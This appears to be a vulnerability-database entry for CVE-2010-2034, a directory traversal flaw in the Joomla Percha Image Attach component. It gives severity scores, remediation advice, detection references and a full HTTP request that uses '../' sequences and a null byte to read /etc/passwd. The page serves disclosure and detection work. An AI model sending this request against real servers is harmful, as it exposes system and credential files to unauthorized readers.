🔙 목록으로 돌아가기

CVE-2010-2034: Joomla! Component Percha Image Attach 1.1 - Directory Traversal

TitleJoomla! Component Percha Image Attach 1.1 - Directory Traversal
Authordaffainfo
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.01646
CVE IDCVE-2010-2034
CWE IDCWE-22
Tags cve2010 cve edb packetstorm joomla lfi percha vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2034.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-2034.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A